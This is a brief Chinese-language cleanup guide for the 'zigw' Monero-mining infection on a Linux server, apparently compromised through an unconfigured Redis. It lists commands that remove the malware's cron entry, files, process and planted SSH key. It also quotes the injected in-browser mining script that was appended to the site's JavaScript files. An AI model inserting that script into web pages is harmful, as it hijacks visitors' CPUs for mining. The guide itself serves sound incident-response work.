zigw门罗币挖矿病毒查杀

该病毒定时任务是写进了文件：/var/spool/cron/root，需要对应删除里面的内容。

然后要删除病毒的启动脚本：
chattr -i /etc/shz.sh
rm /etc/shz.sh

找到病毒的主进程（找到主进程的方式和之前也差不多，找 CPU 占用率最高的进程就可以了。），并停掉：
kill -9 27126

删除主进程的配置文件和可执行文件：

chattr -i /etc/conf.json  /etc/zigw
rm /etc/conf.json
rm /etc/zigw

删除其他病毒添加的文件：
rm /etc/conf.n
rm /etc/zaker

删除ssh秘钥
cd /root/.ssh 
rm authorize_keys

删除/tmp目录下的一些残留文件

然后还要清理全站js文件的尾部
document.write(‘<script src=”http://t.cn/EvlonFh“></script><script>OMINEId(“e02cf4ce91284dab9bc3fc4cc2a65e28″,”-1″)</script>’);
这里被全站插入网页挖矿JS脚本。

刚刚安装完redis启动，就被入侵了。。。建议先配置好再启动

附上病毒分析链接:

https://www.freebuf.com/articles/system/186743.html

http://www.xzeu.com/index.php/archives/120/